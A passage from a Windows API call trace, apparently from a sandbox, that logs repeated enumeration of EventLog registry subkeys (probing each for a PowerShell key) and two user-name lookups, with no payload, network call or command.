	[0818.344] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.345] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.345] CoTaskMemFree (pv=0x25aca0) 
	[0818.345] CoTaskMemFree (pv=0x0) 
	[0818.345] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.345] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.345] CoTaskMemFree (pv=0x25aca0) 
	[0818.345] CoTaskMemFree (pv=0x0) 
	[0818.345] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.345] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.345] CoTaskMemFree (pv=0x25aca0) 
	[0818.345] CoTaskMemFree (pv=0x0) 
	[0818.345] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.345] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x25aca0, lpcchName=0x16d638, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d638, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.345] CoTaskMemFree (pv=0x25aca0) 
	[0818.345] CoTaskMemFree (pv=0x0) 
	[0818.345] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x310) returned 0x0
	[0818.346] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.346] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x314) returned 0x0
	[0818.346] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.346] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x318) returned 0x0
	[0818.346] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.346] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x31c) returned 0x0
	[0818.346] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.346] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x320) returned 0x0
	[0818.346] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.346] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x324) returned 0x0
	[0818.347] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.347] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x328) returned 0x0
	[0818.347] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.347] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x32c) returned 0x0
	[0818.347] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x0) returned 0x2
	[0818.347] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x330) returned 0x0
	[0818.347] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d698 | out: phkResult=0x16d698*=0x334) returned 0x0
	[0818.347] RegCloseKey (hKey=0x334) returned 0x0
	[0818.348] RegCloseKey (hKey=0x30c) returned 0x0
	[0818.349] RegCloseKey (hKey=0x330) returned 0x0
	[0818.358] CoTaskMemAlloc (cb=0x804) returned 0x22cfb0
	[0818.358] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x22cfb0, nSize=0x16d8a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8a8) returned 0x1
	[0818.360] CoTaskMemFree (pv=0x22cfb0) 
	[0818.361] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0818.361] GetUserNameW (in: lpBuffer=0x25aca0, pcbBuffer=0x16d8e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d8e8) returned 1
	[0818.361] CoTaskMemFree (pv=0x25aca0) 
	[0819.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x338) returned 0x0
	[0819.633] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d55c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d55c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.633] CoTaskMemFree (pv=0x0) 
	[0819.633] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.633] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.634] CoTaskMemFree (pv=0x25aca0) 
	[0819.634] CoTaskMemFree (pv=0x0) 
	[0819.634] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.634] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.634] CoTaskMemFree (pv=0x25aca0) 
	[0819.634] CoTaskMemFree (pv=0x0) 
	[0819.634] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.634] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x2, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.634] CoTaskMemFree (pv=0x25aca0) 
	[0819.634] CoTaskMemFree (pv=0x0) 
	[0819.634] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.634] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x3, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.634] CoTaskMemFree (pv=0x25aca0) 
	[0819.634] CoTaskMemFree (pv=0x0) 
	[0819.634] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.634] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x4, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.634] CoTaskMemFree (pv=0x25aca0) 
	[0819.634] CoTaskMemFree (pv=0x0) 
	[0819.634] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.634] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x5, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.634] CoTaskMemFree (pv=0x25aca0) 
	[0819.634] CoTaskMemFree (pv=0x0) 
	[0819.634] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.634] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x6, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.635] CoTaskMemFree (pv=0x25aca0) 
	[0819.635] CoTaskMemFree (pv=0x0) 
	[0819.635] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.635] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x7, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.635] CoTaskMemFree (pv=0x25aca0) 
	[0819.635] CoTaskMemFree (pv=0x0) 
	[0819.635] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.635] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x8, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.635] CoTaskMemFree (pv=0x25aca0) 
	[0819.635] CoTaskMemFree (pv=0x0) 
	[0819.635] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x33c) returned 0x0
	[0819.635] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.635] RegOpenKeyExW (in: hKey=0x338, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x340) returned 0x0
	[0819.635] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.635] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x344) returned 0x0
	[0819.636] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.636] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x348) returned 0x0
	[0819.636] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.636] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x34c) returned 0x0
	[0819.636] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.636] RegOpenKeyExW (in: hKey=0x338, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x350) returned 0x0
	[0819.636] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.636] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x354) returned 0x0
	[0819.636] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.636] RegOpenKeyExW (in: hKey=0x338, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x358) returned 0x0
	[0819.636] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.636] RegOpenKeyExW (in: hKey=0x338, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x35c) returned 0x0
	[0819.637] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x360) returned 0x0
	[0819.637] RegCloseKey (hKey=0x360) returned 0x0
	[0819.637] RegCloseKey (hKey=0x338) returned 0x0
	[0819.637] RegCloseKey (hKey=0x35c) returned 0x0
	[0819.638] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5e8 | out: phkResult=0x16d5e8*=0x35c) returned 0x0
	[0819.638] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d55c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d55c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d558*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.638] CoTaskMemFree (pv=0x0) 
	[0819.638] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.638] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.638] CoTaskMemFree (pv=0x25aca0) 
	[0819.638] CoTaskMemFree (pv=0x0) 
	[0819.638] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.638] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.638] CoTaskMemFree (pv=0x25aca0) 
	[0819.638] CoTaskMemFree (pv=0x0) 
	[0819.638] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.638] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.639] CoTaskMemFree (pv=0x25aca0) 
	[0819.639] CoTaskMemFree (pv=0x0) 
	[0819.639] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.639] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.639] CoTaskMemFree (pv=0x25aca0) 
	[0819.639] CoTaskMemFree (pv=0x0) 
	[0819.639] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.639] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.639] CoTaskMemFree (pv=0x25aca0) 
	[0819.639] CoTaskMemFree (pv=0x0) 
	[0819.639] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.639] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.639] CoTaskMemFree (pv=0x25aca0) 
	[0819.639] CoTaskMemFree (pv=0x0) 
	[0819.639] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.639] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.639] CoTaskMemFree (pv=0x25aca0) 
	[0819.639] CoTaskMemFree (pv=0x0) 
	[0819.639] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.639] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.639] CoTaskMemFree (pv=0x25aca0) 
	[0819.640] CoTaskMemFree (pv=0x0) 
	[0819.640] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0819.640] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x25aca0, lpcchName=0x16d5e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d5e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0819.640] CoTaskMemFree (pv=0x25aca0) 
	[0819.640] CoTaskMemFree (pv=0x0) 
	[0819.640] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x338) returned 0x0
	[0819.640] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.640] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x360) returned 0x0
	[0819.640] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.640] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x364) returned 0x0
	[0819.640] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.640] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x368) returned 0x0
	[0819.640] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.641] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x36c) returned 0x0
	[0819.641] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.641] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x370) returned 0x0
	[0819.641] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.641] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x374) returned 0x0
	[0819.641] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.641] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x378) returned 0x0
	[0819.641] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x0) returned 0x2
	[0819.641] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x37c) returned 0x0
	[0819.641] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d648 | out: phkResult=0x16d648*=0x380) returned 0x0
	[0819.642] RegCloseKey (hKey=0x380) returned 0x0
	[0819.642] RegCloseKey (hKey=0x35c) returned 0x0
	[0819.642] RegCloseKey (hKey=0x37c) returned 0x0
	[0820.538] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d5b8 | out: phkResult=0x16d5b8*=0x37c) returned 0x0
	[0820.538] RegQueryInfoKeyW (in: hKey=0x37c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d52c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d528, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d52c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d528*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.538] CoTaskMemFree (pv=0x0) 
	[0820.538] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.538] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x0, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.539] CoTaskMemFree (pv=0x25aca0) 
	[0820.539] CoTaskMemFree (pv=0x0) 
	[0820.539] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.539] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x1, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.539] CoTaskMemFree (pv=0x25aca0) 
	[0820.539] CoTaskMemFree (pv=0x0) 
	[0820.539] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.539] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x2, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.539] CoTaskMemFree (pv=0x25aca0) 
	[0820.539] CoTaskMemFree (pv=0x0) 
	[0820.539] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.539] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x3, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.539] CoTaskMemFree (pv=0x25aca0) 
	[0820.539] CoTaskMemFree (pv=0x0) 
	[0820.539] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.540] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x4, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.540] CoTaskMemFree (pv=0x25aca0) 
	[0820.540] CoTaskMemFree (pv=0x0) 
	[0820.540] CoTaskMemAlloc (cb=0x204) returned 0x25aca0
	[0820.540] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x5, lpName=0x25aca0, lpcchName=0x16d5b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d5b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0820.540] CoTaskMemFree (pv=0x25aca0) 
	[0820.540] CoTaskMemFree (pv=0x0) 
